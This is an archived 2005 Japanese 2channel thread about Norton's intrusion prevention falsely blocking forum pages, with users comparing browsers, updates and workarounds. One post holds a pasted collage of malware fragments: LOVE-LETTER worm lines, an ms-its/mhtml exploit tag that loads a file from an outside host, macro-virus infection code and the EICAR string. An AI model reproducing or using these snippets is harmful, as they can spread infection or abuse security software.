0001動け動けウゴウゴ2ちゃんねる
2005/11/28(月) 16:08:40ID:bR9gbCGm0アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
探検
ノートン誤作動対策本部
■ このスレッドは過去ログ倉庫に格納されています
アドレスをクリックすると攻撃者を追跡できます
この攻撃について詳しくは シマンテック・セキュリティ・レスポンス
0522動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 04:37:08ID:h85ucp1x00523動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 12:26:49ID:50GK9X4n00524http://h.pic.to/30ayt
2005/12/04(日) 12:37:37ID:EpZg83SWOc.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
End Sub
0525動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 12:57:25ID:S0JmhzX20どういう誤認で誤作動するわけ?具体的に頼む
0526動け動けウゴウゴ2ちゃんねる
NGNG>>22の記事を読めばなんとなくわかるかと。
0527動け動けウゴウゴ2ちゃんねる
2005/12/04(日) 20:13:57ID:S0JmhzX20d
0528動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 01:34:57ID:FdnPK1jR00529動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 17:48:16ID:5iffv5U70確かに反応はしなくなるが、それを逆手に利用しLogフォルダを狙ってくるかもと妄想してみる
まだじゃまくさいが*.dat毎に設定した方が…
0530動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 18:11:55ID:b5q7G/4D00531動け動けウゴウゴ2ちゃんねる
2005/12/05(月) 18:29:11ID:uXQGgEEr00532動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:43:56ID:LkdisUM70ノートン誤作動対策本部
http://qb5.2ch.net/test/read.cgi/operate/1133161720/
ここをミロ
0533動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:45:13ID:yXevFHab00534動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:45:56ID:FdwqPeUF0ちゃんと見なきゃだよ〜〜
0535動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 15:49:22ID:S/1II8Rk0わかったか?
よし、わかったんなら席に着け。
0536動け動けウゴウゴ2ちゃんねる
2005/12/06(火) 16:59:02ID:ba9NK7rA0笑ったり泣いたり出来なくしてやる!
0537動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 15:54:11ID:h/m9952k0( ´д)ヒソ(´д`)ヒソ(д` )
0538動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 16:40:37ID:aPTNAClw0まるでそびえたつクソだ!
0539動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 20:54:02ID:zqDlR1140まったくもー。
0540動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 22:38:17ID:p1e7f/VT0侵入阻止→拡張→HTTP MSIE javaScript OnLoad Rte CodeExec
のチェックはずして、
オミトロンの
Onload Unloader
をオンにスルだけで解決するんだが。
何をそんなに騒ぐ。
0541動け動けウゴウゴ2ちゃんねる
2005/12/07(水) 23:44:58ID:KWMarFNX00542動け動けウゴウゴ2ちゃんねる
2005/12/08(木) 01:43:07ID:J0d2TFmr0何ら問題は無い。
問題はIEの味噌も糞も一緒くたにとっとくテンポラリフォルダだ。
これもブラウザ閉じた時にキャッシュを削除する設定にしておけば
多少は安心だろう。
0543動け動けウゴウゴ2ちゃんねる
2005/12/08(木) 20:46:26ID:vweIWjoM0やれやれ・・・
0544動け動けウゴウゴ2ちゃんねる
2005/12/10(土) 21:42:55ID:L+GgO2q30まとめサイトの対策してるのに
0545動け動けウゴウゴ2ちゃんねる
2005/12/11(日) 09:53:51ID:UxoL4GzC00546動け動けウゴウゴ2ちゃんねる
2005/12/11(日) 10:27:46ID:NT8ogfEm00547動け動けウゴウゴ2ちゃんねる
2005/12/11(日) 19:58:01ID:u72QiQwD00548動け動けウゴウゴ2ちゃんねる
2005/12/12(月) 07:35:05ID:Oxp01vs20なわけねーだろボケ
0549動け動けウゴウゴ2ちゃんねる
2005/12/12(月) 23:00:52ID:6AEQSNlY0誤作動うぜぇー
0550動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:03:08ID:EccYzO0u00551動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:14:46ID:mrrPdy+U00552動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:15:43ID:VF/WnYDZ0片方が対策しただけのような気がする。
0553動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:16:24ID:jbIWO4hy00554動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 00:37:32ID:mrrPdy+U0それなりに情報も行き渡ったって事ね、了解。
0555動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:15:55ID:ct+jZ+de0どうやらこの前のupdateで、Symantecが対応したようだ。
まあ、定義ファイルちょこっといじるだけだしね。
0556動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:24:49ID:+TojAte/00557動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:27:38ID:P59zanKB00558動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 01:49:57ID:4oy/C4vr00559動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 07:12:17ID:yYTaEYqU0何故か専用ブラウザ(JaneDoeView)だと問題なくなったけど
IEで見ると以前と同じように侵入防止される
0560動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 10:52:51ID:LUKc0KsC0なわけねーだろボケ
0561動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 13:26:01ID:Mc0lYOUq0ログを一旦消して、誤爆文字列を再読み込みさせると遮断されるよw
0562動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 16:33:49ID:Fiu/blpC02005+かちゅだけど、ログ消して再取得してもまったく問題ないよ。
確かこのスレにもコード張ってあったよね。
該当スレ削除されてるのかな?
数日前から信頼ゾーン元に戻してあちこち見てるけど、一度も遮断は起きてない。
0563動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 16:46:09ID:e28xE5tY0ログ削除してJane再起動してこのスレ取得してみたけど問題なし
0564動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 16:47:53ID:e28xE5tY00565動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 17:19:46ID:LUKc0KsC00566動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 17:50:38ID:EccYzO0u00567動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 18:56:54ID:i8UVIJLB00568動け動けウゴウゴ2ちゃんねる
NGNG0569動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 20:41:24ID:yYTaEYqU0ちゃんと消してからやってるけど?
とりあえず自分で検証してから煽りいれないとただの恥ずかしい人だぞ
0570動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 21:21:25ID:qGOg/NGt0JaneDoeStyleでこのスレ開いてみたけど大丈夫でした。
(もちろん、ログ再所得済)
ただし>>559同様、IEはダメ。
一度IEで開くと、その後はJaneでもダメ。
0571動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 21:31:58ID:VBj/AhMS00572動け動けウゴウゴ2ちゃんねる
2005/12/13(火) 21:39:18ID:mvJZvZGa0専用ブラウザでの閲覧は現在問題無しみたいだ。
もちろんログ消去をやった上で。
少なくても日曜日の段階では、自分も専用ブラウザの閲覧でトラップに引っ掛かっていた。
317 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:25:00
2005は直ってないの?直ってたら乗り換えようと思ってるんだけど
318 名前:名無しさん@お腹いっぱい。 [] 投稿日:2005/12/11(日) 14:50:13
2006が直った言うのはマジですか?
319 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 14:58:53
2006直ってないよ。
シグネチャ更新しても、問題のヤツはそのまま残ってて、いきなり遮断されたしw
プログラム本体の更新が無い限り直らんでしょ?これ。
ホントに直った人いるの?
320 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:00:33
また工作員の虚言か!
321 名前:297 [sage] 投稿日:2005/12/11(日) 15:00:54
ありがとう。
やってみるよ。
322 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2005/12/11(日) 15:27:18
あれ・・・DL板で更新したら問題なく更新されたんで直ったと思ったが何回かやってると遮断してるな・・@2004
なんじゃこりゃ
で、IEによる閲覧では現在も遮断される事から、最新のアップデートでもノートントラップが対応出来ていないのは明らか。
どーなってんの???
0573動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 12:27:12ID:WvVfrDFo0シマ対応した模様。
この問題については、解決したのでは。
0574動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 12:54:03ID:4UluMZjh0全然対応してないから。
0575動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 13:00:51ID:WvVfrDFo00576動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 13:30:12ID:gN/cypwS00577570
2005/12/14(水) 13:38:58ID:065kioyb0Updateしてみましたが、やはりIEでは遮断されました。
0578動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 15:21:30ID:B2e/IoHz0本気で売買契約解消しようと思うんだが、
誰かシマンテックと交渉した奴いる?
これはOSのせいじゃなく「ノートンのFWだけ」の誤作動だから
返品できるよな? 交渉は小売とした方が良いのか?
0579動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 15:21:38ID:lH3ozVBK0専ブラ(Live2ch、かちゅ)では遮断されなかった。
普通のブラウザ(IE、Opera)だと遮断された。
うーん、不思議。
0580動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 15:41:34ID:J+E7KJcf0がんばれ馬鹿。
負けるな馬鹿。
0581動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 15:57:29ID:B2e/IoHz0プ 工作員必死だなw
都合が悪いレスを煽って誤魔化すってことは
やっぱり返品出来るんだなw
そりゃそうだ他社のFWじゃ誤作動しなくて
ノートンだけ誤作動じゃ言い訳できないもんな。
工作員の必死さから良く分かった。
返品の話が都合悪いの?w んー?w 悪いの?w
0582動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 16:01:29ID:lfvSkMHa0もし、信用できるサイトの観覧に不都合が生じた場合は
そのサイトを信頼ゾーンに追加して下さい。
と。
0583動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 16:09:17ID:B2e/IoHz0>サイトの観覧に不都合が生じた場合は
>そのサイトを信頼ゾーンに追加して下さい。
いやだ。
信用できるかどうか分からんからFW入れてんだよ。
それに今回は
「サイトの観覧に不都合が生じた場合は〜」 じゃねーだろ?
「FWのコード識別に不具合が生じてる」
「不都合」でなく「誤作動」
0584動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 16:27:23ID:lfvSkMHa0お客様、何度も申し上げますが誤作動ではなく仕様です。
なにとぞ御理解下さい。
分かりやすく説明するとこうなる↓
ハァ?どーでもいい一般ユーザーは黙ってろっての!
グチグチうるせーな。
スキル無いボケが生意気いってんじゃねーよ!!
返金?返品?シラネーヨ!
嫌なら裁判でも起こせばいいだろー
知識の無い裁判官言いくるめる弁護士雇う金がこっちにはあるんだボケ!!
ネットで吠えてねーでやってみろ根性なしが(ププp
0585動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 16:46:20ID:a5x2HY3T0これってノートン先生誤作動の元になったセキュリティホールとは無関係ですか?
http://www.microsoft.com/japan/security/bulletins/ms05-054e.mspx
0586動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 16:56:53ID:JiKINitk0対応したみたいだね
それでもupdateしない馬鹿がいるかもしれないから誤作動を続けるであろうノートン先生に敬意を示さねば
http://pcweb.mycom.co.jp/news/2005/12/14/007.html
0587動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 17:01:46ID:JiKINitk0一応コピペ
>「不適切な Document Object Model オブジェクトのメモリ破損の脆弱性」は、
>JavaScriptでwindow()イベントが使われた場合に任意のコードが実行されるというもの。
>ネット上では5月にすでに情報が公開され、この脆弱性を悪用するトロイの木馬も登場しており、
>ユーザーは至急パッチを適用すべきだ。
0588動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 17:45:49ID:GDsyONUI00589動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 18:07:11ID:UojIzTZi0同じく駄目でしたヽ(゚∀゚)ノ
0590動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 18:31:24ID:zKLyALpC00591動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 18:45:29ID:a5x2HY3T0この悪戯もいずれ下火になると思うので、もう設定で対処しないで
引っ掛かったら一時的に切って遮断解除、が一番安全だとは思うけどね
ただ、例えて言えば、ノートン先生って
子供が男子高校生なのに、痴漢がどうのとかいって塾の送り迎えしたり
二十歳超えたのに、夜は危ないから8時以降は外出するのは控えなさい、
とかいうオカンなんだよなw
五月蠅い事この上ない
>>586,587
thx
0592動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 19:04:45ID:u8wmbv9f00593動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 20:30:16ID:4UluMZjh0>MSのパッチを当てて、ノートンの侵入検出シグネチャを切れば良いって事だな。
馬鹿じゃないですか?
0594動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 21:57:44ID:JiKINitk0違うの?
0595動け動けウゴウゴ2ちゃんねる
NGNGというのなら592の方法で正しいけど。
0596動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 23:03:25ID:a5x2HY3T00597動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 23:05:28ID:JiKINitk0脆弱性はパッチで解決されてる訳だし
0598動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 23:08:17ID:QMn/vcON0ノートンが誤反応する事が問題だろ。
なんでこんなに馬鹿が多いの?
0599動け動けウゴウゴ2ちゃんねる
2005/12/14(水) 23:37:45ID:b/+ME8N500600動け動けウゴウゴ2ちゃんねる
2005/12/15(木) 00:15:42ID:utkefdDb0ここ2ch運用情報板のスレだし、、、
利用者が対策して2ちゃん使えれば解決でしょ?
0601動け動けウゴウゴ2ちゃんねる
2005/12/15(木) 06:00:20ID:Gx5GPIwR0バカはおまい一人だと思われ。
脳豚の誤反応を語るならソフトあたりにスレ建てろ。
0602動け動けウゴウゴ2ちゃんねる
2005/12/15(木) 07:07:26ID:/Hth94uT0っての切っても問題ないの?
これってMSのバグの脆弱性を埋めるためだけのやつだよね?
0603動け動けウゴウゴ2ちゃんねる
2005/12/15(木) 07:08:37ID:/Hth94uT00604動け動けウゴウゴ2ちゃんねる
2005/12/15(木) 10:48:51ID:0IKFE+YG0それ以前にブロックされてたスレが普通に読み込めたので
シマが対応したと思ったのだが、やはりスレによっては、
ブロックされるようです。
まんどくさいなー、悪戯やめれ!
0605動け動けウゴウゴ2ちゃんねる
2005/12/15(木) 19:35:35ID:WsBkUH820ノートンが対応したって言う馬鹿がこのスレにいるから
そういう奴もでてくるんだよ。
0606動け動けウゴウゴ2ちゃんねる
2005/12/18(日) 18:04:47ID:/Gl1/UV+0に関する文字列の検知を変更しないわけね?じゃあシグネチャ除外が一番かなあ…
個人的にはどうせIEほとんど使わんし、どこぞの反日クラッカーに2ちゃん鯖クラックされる
リスクの方が怖いや。
0607動け動けウゴウゴ2ちゃんねる
2005/12/18(日) 19:25:41ID:JVV9/DvK0これってシマンテックの社員なの?
専ブラ使っても相変わらず駄目だよ。
悪質な嘘をつかないでくれるかな。
マジでムカついちゃったよ。
0608動け動けウゴウゴ2ちゃんねる
2005/12/18(日) 19:36:09ID:RN6yyh6F0でログ取得し直しても問題なく使えてるけど?
馬鹿みたいな事書き込んでないで先ず自分の環境くらい書こうよ
0609動け動けウゴウゴ2ちゃんねる
2005/12/18(日) 19:38:23ID:nKWk8rm50なんで社員がそんなこというんだよw
あんた馬鹿だろ。
0610動け動けウゴウゴ2ちゃんねる
2005/12/18(日) 21:05:53ID:aV+RNAht0無意識に警告が出ない設定にしてあるって事に早く気がついたほうがいいよ。
解らなくて警告が出ないより、解ってて解除する方がいいからね。
0611動け動けウゴウゴ2ちゃんねる
2005/12/18(日) 23:56:35ID:QUwDeAJW0NIS2006の「HTTP MSIE JavaScript Onload〜」の侵入防止シグネチャ有効。
そのシグネチャのプロパティーで、検出時に警告を出すように設定している。
Twintailのキャッシュをフォルダ毎削除して、このスレを読み込んでも反応無し。
そのあと、IEでこのスレを開くと遮断される。
遮断されたIPを解除し、Twintailのログを削除して、再読み込みしても反応無し。
そのあと、IEでこのスレを開くと再び遮断される。
このような症状になってる人が他にも居ると思うが、マジで原因が判らんよ…
0612動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 07:31:36ID:9dyvKkJ302ch専ブラで問題なしIEで問題ありって人が実際多数いるんだし
俺もJaneDoeView最新版で問題なし
お前みたいな訳分からない否定をするやつは何故自分の環境を書いたり試したりしないんだ?
0613動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 07:33:42ID:UggSL9si00614動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 07:40:57ID:9dyvKkJ30OnloadのやつはIE特有のバグらしいからIEコンポーネント系以外は反応しないように
対策したかも知れないとか考えられないの?
とりあえず変な事ぼやいてないで何か否定材料出してよ、検証しようがないから
0615動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 08:00:45ID:9dyvKkJ30FireFoxってのを入れて試してみたけどこっちでも反応したな
単純にIE、非IEで分けている訳では無いみたいだ
0616動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 10:35:46ID:TERjzhIV0Operaで反応し、IEコンポーネントの2chブラウザで反応しないんだが。
もちろん警告は出るようにしてあるよ。
0617動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 10:42:56ID:GcAN0Ejt00618動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 10:44:53ID:UggSL9si00619動け動けウゴウゴ2ちゃんねる
2005/12/19(月) 13:15:13ID:FcoWUZ/m0もしかしたら、どこかで陰険なチェックが入ってないかと疑ってみたんだがw
0620動け動けウゴウゴ2ちゃんねる
2005/12/20(火) 18:40:04ID:bOuIhoAD00621動け動けウゴウゴ2ちゃんねる
2005/12/20(火) 23:59:21ID:M1SYBKmT0■ このスレッドは過去ログ倉庫に格納されています
ニュース
- 【サッカー】U23日本代表 ウズベキスタン下し8年ぶり優勝!山田楓喜劇的ゴールに小久保がPKセーブ! [久太郎★]
- 【サッカー】U23日本代表、アジア1位でパリ五輪はD組 南米王者パラグアイ、マリ、イスラエルと同組 [阿弥陀ヶ峰★]
- 【サッカー】U-23日本代表、優勝!満点評価になったのは【U-23ウズベキスタン戦どこよりも速い採点/U-23アジアカップ】 [久太郎★]
- 「報道の自由度」世界的に悪化 日本は70位に後退(G7最下位) RSF [少考さん★]
- 【千葉】「このクソガキ」「お前の家に行って殺してやる」 転倒を心配し声かけた男児に暴行 容疑で39歳の自称無職女逮捕 [おっさん友の会★]
- つまらない映画を最後まで見る必要はない?人気漫画のテーマにネット議論「その通り」「損してる」「結末で全ての評価がひっくり返る」 [muffin★]
- 【アジア最強を】ウズベキスタン vs. 日本U23【決める戦い】 Part.2 [952924637]
- 【GW暇な奴来い】安価で指定されたものを全力で探してうpするスレ
- ひろゆき「天皇ってあいつら日本人じゃないんですよ」👈無事大炎上、東浩紀「流れかわってきたなあ」 [185956617]
- 【NHK】日本vsウズベキスタン【U23アジアカップ決勝】
- 小久保玲央ブライアンwwwwwwwwwwwwwwwwwwwwwwwwwwwww [316257979]
- 【サッカー決勝】日本vsウズベキスタン